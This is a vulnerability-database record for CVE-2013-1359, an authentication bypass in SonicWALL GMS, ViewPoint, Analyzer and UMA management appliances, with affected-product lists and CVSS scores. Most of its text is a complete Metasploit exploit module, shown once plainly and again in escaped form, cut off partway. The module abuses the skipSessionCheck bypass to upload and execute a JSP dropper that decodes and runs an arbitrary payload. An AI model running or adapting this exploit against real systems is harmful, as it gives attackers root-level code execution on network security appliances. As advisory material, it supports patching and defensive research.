All the vulnerabilites related to sonicwall - viewpoint
var-202002-0532
Vulnerability from variot
An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account. plural SonicWALL The product contains an authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Attackers can exploit this issue to gain administrative access to the web interface. This allows attackers to execute arbitrary code with SYSTEM privileges that could fully compromise the system. The following versions are affected: GMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x GMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs. Authorization vulnerabilities exist in several DELL SonicWALL products. ##
This file is part of the Metasploit Framework and may be subject to
redistribution and commercial restrictions. Please see the Metasploit
web site for more information on licensing and terms of use.
http://metasploit.com/
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'SonicWALL GMS 6 Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in SonicWALL GMS. It exploits two
vulnerabilities in order to get its objective. An authentication bypass in the
Web Administration interface allows to abuse the "appliance" application and upload
an arbitrary payload embedded in a JSP. The module has been tested successfully on
SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual
Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run
successfully while testing, shell payload have been used.
},
'Author' =>
[
'Nikolas Sotiriu', # Vulnerability Discovery
'Julian Vilas <julian.vilas[at]gmail.com>', # Metasploit module
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-1359'],
[ 'OSVDB', '89347' ],
[ 'BID', '57445' ],
[ 'EDB', '24204' ]
],
'Privileged' => true,
'Platform' => [ 'win', 'linux' ],
'Targets' =>
[
[ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
[ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 17 2012'))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/'])
], self.class)
end
def on_new_session
# on_new_session will force stdapi to load (for Linux meterpreter)
end
def generate_jsp
var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)
var_exepath = Rex::Text.rand_text_alpha(rand(8)+8)
var_data = Rex::Text.rand_text_alpha(rand(8)+8)
var_inputstream = Rex::Text.rand_text_alpha(rand(8)+8)
var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8)
var_numbytes = Rex::Text.rand_text_alpha(rand(8)+8)
var_bytearray = Rex::Text.rand_text_alpha(rand(8)+8)
var_bytes = Rex::Text.rand_text_alpha(rand(8)+8)
var_counter = Rex::Text.rand_text_alpha(rand(8)+8)
var_char1 = Rex::Text.rand_text_alpha(rand(8)+8)
var_char2 = Rex::Text.rand_text_alpha(rand(8)+8)
var_comb = Rex::Text.rand_text_alpha(rand(8)+8)
var_exe = Rex::Text.rand_text_alpha(rand(8)+8)
@var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8)
var_proc = Rex::Text.rand_text_alpha(rand(8)+8)
var_fperm = Rex::Text.rand_text_alpha(rand(8)+8)
var_fdel = Rex::Text.rand_text_alpha(rand(8)+8)
jspraw = "<%@ page import=\"java.io.*\" %>\n"
jspraw << "<%\n"
jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n"
jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n"
jspraw << "String #{var_data} = \"\";\n"
jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n"
jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n"
jspraw << "}\n"
jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n"
jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n"
jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n"
jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n"
jspraw << "#{var_inputstream}.read(#{var_bytearray});\n"
jspraw << "#{var_inputstream}.close();\n"
jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n"
jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n"
jspraw << "{\n"
jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n"
jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n"
jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n"
jspraw << "#{var_comb} <<= 4;\n"
jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n"
jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n"
jspraw << "}\n"
jspraw << "#{var_outputstream}.write(#{var_bytes});\n"
jspraw << "#{var_outputstream}.close();\n"
jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n"
jspraw << "String[] #{var_fperm} = new String[3];\n"
jspraw << "#{var_fperm}[0] = \"chmod\";\n"
jspraw << "#{var_fperm}[1] = \"+x\";\n"
jspraw << "#{var_fperm}[2] = #{var_exepath};\n"
jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n"
jspraw << "if (#{var_proc}.waitFor() == 0) {\n"
jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
jspraw << "}\n"
# Linux and other UNICES allow removing files while they are in use...
jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n"
jspraw << "} else {\n"
# Windows does not ..
jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
jspraw << "}\n"
jspraw << "%>\n"
return jspraw
end
def get_install_path
res = send_request_cgi(
{
'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1",
'method' => 'POST',
'connection' => 'TE, close',
'headers' =>
{
'TE' => "deflate,gzip;q=0.3",
},
'vars_post' => {
'num' => '123456',
'action' => 'show_diagnostics',
'task' => 'search',
'item' => 'application_log',
'criteria' => '*.*',
'width' => '500'
}
})
if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/
return $1
end
return nil
end
def upload_file(location, filename, contents)
post_data = Rex::MIME::Message.new
post_data.add_part("file_system", nil, nil, "form-data; name=\"action\"")
post_data.add_part("uploadFile", nil, nil, "form-data; name=\"task\"")
post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"")
post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#{filename}\"")
data = post_data.to_s
data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
res = send_request_cgi(
{
'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1",
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'headers' =>
{
'TE' => "deflate,gzip;q=0.3",
},
'connection' => 'TE, close'
})
if res and res.code == 200 and res.body.empty?
return true
else
return false
end
end
def check
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
if get_install_path.nil?
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Vulnerable
end
def exploit
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
# Get Tomcat installation path
print_status("#{@peer} - Retrieving Tomcat installation path...")
install_path = get_install_path
if install_path.nil?
fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path")
end
print_good("#{@peer} - Tomcat installed on #{install_path}")
if target['Platform'] == "linux"
@location = "#{install_path}webapps/appliance/"
elsif target['Platform'] == "win"
@location = "#{install_path}webapps\\appliance\\"
end
# Upload the JSP and the raw payload
@jsp_name = rand_text_alphanumeric(8+rand(8))
jspraw = generate_jsp
# Specify the payload in hex as an extra file..
payload_hex = payload.encoded_exe.unpack('H*')[0]
print_status("#{@peer} - Uploading the payload")
if upload_file(@location, "#{@var_hexfile}.txt", payload_hex)
print_good("#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt")
else
fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload")
end
print_status("#{@peer} - Uploading the payload")
if upload_file(@location, "#{@jsp_name}.jsp", jspraw)
print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp")
else
fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp")
end
print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
res = send_request_cgi(
{
'uri' => "#{@uri}appliance/#{@jsp_name}.jsp",
'method' => 'GET'
})
if res and res.code != 200
print_warning("#{@peer} - Error triggering the payload")
end
register_files_for_cleanup("#{@location}#{@var_hexfile}.txt")
register_files_for_cleanup("#{@location}#{@jsp_name}.jsp")
end
end
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202002-0532", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "analyzer", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "7.0" }, { "model": "global management system", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "4.1" }, { "model": "global management system", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "5.0" }, { "model": "global management system", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "5.1" }, { "model": "global management system", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "6.0" }, { "model": "global management system", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "7.0" }, { "model": "universal management appliance", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "5.1" }, { "model": "universal management appliance", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "6.0" }, { "model": "universal management appliance", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "7.0" }, { "model": "viewpoint", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "4.1" }, { "model": "viewpoint", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "5.0" }, { "model": "viewpoint", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "6.0" }, { "model": "viewpoint", "scope": "eq", "trust": 0.8, "vendor": "sonicwall", "version": "5.1" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "db": "NVD", "id": "CVE-2013-1359" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:universal_management_appliance:5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:universal_management_appliance:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:universal_management_appliance:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:viewpoint:4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:viewpoint:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:viewpoint:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2013-1359" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Nikolas Sotiriu", "sources": [ { "db": "BID", "id": "57445" }, { "db": "CNNVD", "id": "CNNVD-201301-377" } ], "trust": 0.9 }, "cve": "CVE-2013-1359", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Complete", "baseScore": 10.0, "confidentialityImpact": "Complete", "exploitabilityScore": null, "id": "JVNDB-2013-007224", "impactScore": null, "integrityImpact": "Complete", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-61361", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2013-007224", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2013-1359", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "JVNDB-2013-007224", "trust": 0.8, "value": "Critical" }, { "author": "CNNVD", "id": "CNNVD-201301-377", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-61361", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-61361" }, { "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "db": "NVD", "id": "CVE-2013-1359" }, { "db": "CNNVD", "id": "CNNVD-201301-377" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account. plural SonicWALL The product contains an authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. \nAttackers can exploit this issue to gain administrative access to the web interface. This allows attackers to execute arbitrary code with SYSTEM privileges that could fully compromise the system. \nThe following versions are affected:\nGMS/Analyzer/UMA 7.0.x\nGMS/ViewPoint/UMA 6.0.x\nGMS/ViewPoint/UMA 5.1.x\nGMS/ViewPoint 5.0.x\nGMS/ViewPoint 4.1.x. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs. Authorization vulnerabilities exist in several DELL SonicWALL products. ##\n# This file is part of the Metasploit Framework and may be subject to\n# redistribution and commercial restrictions. Please see the Metasploit\n# web site for more information on licensing and terms of use. \n# http://metasploit.com/\n##\n\nrequire \u0027msf/core\u0027\n\nclass Metasploit3 \u003c Msf::Exploit::Remote\n\tRank = GoodRanking\n\n\tHttpFingerprint = { :pattern =\u003e [ /Apache-Coyote/ ] }\n\n\tinclude Msf::Exploit::Remote::HttpClient\n\tinclude Msf::Exploit::EXE\n\tinclude Msf::Exploit::FileDropper\n\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\n\t\t\t\u0027Name\u0027 =\u003e \u0027SonicWALL GMS 6 Arbitrary File Upload\u0027,\n\t\t\t\u0027Description\u0027 =\u003e %q{\n\t\t\t\t\tThis module exploits a code execution flaw in SonicWALL GMS. It exploits two\n\t\t\t\tvulnerabilities in order to get its objective. An authentication bypass in the\n\t\t\t\tWeb Administration interface allows to abuse the \"appliance\" application and upload\n\t\t\t\tan arbitrary payload embedded in a JSP. The module has been tested successfully on\n\t\t\t\tSonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual\n\t\t\t\tAppliance (Linux). On the Virtual Appliance the linux meterpreter hasn\u0027t run\n\t\t\t\tsuccessfully while testing, shell payload have been used. \n\t\t\t},\n\t\t\t\u0027Author\u0027 =\u003e\n\t\t\t\t[\n\t\t\t\t\t\u0027Nikolas Sotiriu\u0027, # Vulnerability Discovery\n\t\t\t\t\t\u0027Julian Vilas \u003cjulian.vilas[at]gmail.com\u003e\u0027, # Metasploit module\n\t\t\t\t\t\u0027juan vazquez\u0027 # Metasploit module\n\t\t\t\t],\n\t\t\t\u0027License\u0027 =\u003e MSF_LICENSE,\n\t\t\t\u0027References\u0027 =\u003e\n\t\t\t\t[\n\t\t\t\t\t[ \u0027CVE\u0027, \u00272013-1359\u0027],\n\t\t\t\t\t[ \u0027OSVDB\u0027, \u002789347\u0027 ],\n\t\t\t\t\t[ \u0027BID\u0027, \u002757445\u0027 ],\n\t\t\t\t\t[ \u0027EDB\u0027, \u002724204\u0027 ]\n\t\t\t\t],\n\t\t\t\u0027Privileged\u0027 =\u003e true,\n\t\t\t\u0027Platform\u0027 =\u003e [ \u0027win\u0027, \u0027linux\u0027 ],\n\t\t\t\u0027Targets\u0027 =\u003e\n\t\t\t\t[\n\t\t\t\t\t[ \u0027SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2\u0027,\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\u0027Arch\u0027 =\u003e ARCH_X86,\n\t\t\t\t\t\t\t\u0027Platform\u0027 =\u003e \u0027win\u0027\n\t\t\t\t\t\t}\n\t\t\t\t\t],\n\t\t\t\t\t[ \u0027SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)\u0027,\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\u0027Arch\u0027 =\u003e ARCH_X86,\n\t\t\t\t\t\t\t\u0027Platform\u0027 =\u003e \u0027linux\u0027\n\t\t\t\t\t\t}\n\t\t\t\t\t]\n\t\t\t\t],\n\t\t\t\u0027DefaultTarget\u0027 =\u003e 0,\n\t\t\t\u0027DisclosureDate\u0027 =\u003e \u0027Jan 17 2012\u0027))\n\n\t\tregister_options(\n\t\t\t[\n\t\t\t\tOpt::RPORT(80),\n\t\t\t\tOptString.new(\u0027TARGETURI\u0027, [true, \u0027Path to SonicWall GMS\u0027, \u0027/\u0027])\n\t\t\t], self.class)\n\tend\n\n\n\tdef on_new_session\n\t\t# on_new_session will force stdapi to load (for Linux meterpreter)\n\tend\n\n\n\tdef generate_jsp\n\t\tvar_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_exepath = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_data = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_inputstream = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_outputstream = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_numbytes = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_bytearray = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_bytes = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_counter = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_char1 = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_char2 = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_comb = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_exe = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\t@var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_proc = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_fperm = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_fdel = Rex::Text.rand_text_alpha(rand(8)+8)\n\n\t\tjspraw = \"\u003c%@ page import=\\\"java.io.*\\\" %\u003e\\n\"\n\t\tjspraw \u003c\u003c \"\u003c%\\n\"\n\t\tjspraw \u003c\u003c \"String #{var_hexpath} = application.getRealPath(\\\"/\\\") + \\\"/#{@var_hexfile}.txt\\\";\\n\"\n\t\tjspraw \u003c\u003c \"String #{var_exepath} = System.getProperty(\\\"java.io.tmpdir\\\") + \\\"/#{var_exe}\\\";\\n\"\n\t\tjspraw \u003c\u003c \"String #{var_data} = \\\"\\\";\\n\"\n\n\t\tjspraw \u003c\u003c \"if (System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") != -1){\\n\"\n\t\tjspraw \u003c\u003c \"#{var_exepath} = #{var_exepath}.concat(\\\".exe\\\");\\n\"\n\t\tjspraw \u003c\u003c \"}\\n\"\n\n\t\tjspraw \u003c\u003c \"FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\\n\"\n\t\tjspraw \u003c\u003c \"FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\\n\"\n\n\t\tjspraw \u003c\u003c \"int #{var_numbytes} = #{var_inputstream}.available();\\n\"\n\t\tjspraw \u003c\u003c \"byte #{var_bytearray}[] = new byte[#{var_numbytes}];\\n\"\n\t\tjspraw \u003c\u003c \"#{var_inputstream}.read(#{var_bytearray});\\n\"\n\t\tjspraw \u003c\u003c \"#{var_inputstream}.close();\\n\"\n\n\t\tjspraw \u003c\u003c \"byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\\n\"\n\t\tjspraw \u003c\u003c \"for (int #{var_counter} = 0; #{var_counter} \u003c #{var_numbytes}; #{var_counter} += 2)\\n\"\n\t\tjspraw \u003c\u003c \"{\\n\"\n\t\tjspraw \u003c\u003c \"char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\\n\"\n\t\tjspraw \u003c\u003c \"char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\\n\"\n\t\tjspraw \u003c\u003c \"int #{var_comb} = Character.digit(#{var_char1}, 16) \u0026 0xff;\\n\"\n\t\tjspraw \u003c\u003c \"#{var_comb} \u003c\u003c= 4;\\n\"\n\t\tjspraw \u003c\u003c \"#{var_comb} += Character.digit(#{var_char2}, 16) \u0026 0xff;\\n\"\n\t\tjspraw \u003c\u003c \"#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\\n\"\n\t\tjspraw \u003c\u003c \"}\\n\"\n\n\t\tjspraw \u003c\u003c \"#{var_outputstream}.write(#{var_bytes});\\n\"\n\t\tjspraw \u003c\u003c \"#{var_outputstream}.close();\\n\"\n\n\t\tjspraw \u003c\u003c \"if (System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") == -1){\\n\"\n\t\tjspraw \u003c\u003c \"String[] #{var_fperm} = new String[3];\\n\"\n\t\tjspraw \u003c\u003c \"#{var_fperm}[0] = \\\"chmod\\\";\\n\"\n\t\tjspraw \u003c\u003c \"#{var_fperm}[1] = \\\"+x\\\";\\n\"\n\t\tjspraw \u003c\u003c \"#{var_fperm}[2] = #{var_exepath};\\n\"\n\t\tjspraw \u003c\u003c \"Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\\n\"\n\t\tjspraw \u003c\u003c \"if (#{var_proc}.waitFor() == 0) {\\n\"\n\t\tjspraw \u003c\u003c \"#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\\n\"\n\t\tjspraw \u003c\u003c \"}\\n\"\n\t\t# Linux and other UNICES allow removing files while they are in use... \n\t\tjspraw \u003c\u003c \"File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\\n\"\n\t\tjspraw \u003c\u003c \"} else {\\n\"\n\t\t# Windows does not .. \n\t\tjspraw \u003c\u003c \"Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\\n\"\n\t\tjspraw \u003c\u003c \"}\\n\"\n\n\t\tjspraw \u003c\u003c \"%\u003e\\n\"\n\t\treturn jspraw\n\tend\n\n\tdef get_install_path\n\t\tres = send_request_cgi(\n\t\t\t{\n\t\t\t\t\u0027uri\u0027 =\u003e \"#{@uri}appliance/applianceMainPage?skipSessionCheck=1\",\n\t\t\t\t\u0027method\u0027 =\u003e \u0027POST\u0027,\n\t\t\t\t\u0027connection\u0027 =\u003e \u0027TE, close\u0027,\n\t\t\t\t\u0027headers\u0027 =\u003e\n\t\t\t\t\t{\n\t\t\t\t\t\t\u0027TE\u0027 =\u003e \"deflate,gzip;q=0.3\",\n\t\t\t\t\t},\n\t\t\t\t\u0027vars_post\u0027 =\u003e {\n\t\t\t\t\t\u0027num\u0027 =\u003e \u0027123456\u0027,\n\t\t\t\t\t\u0027action\u0027 =\u003e \u0027show_diagnostics\u0027,\n\t\t\t\t\t\u0027task\u0027 =\u003e 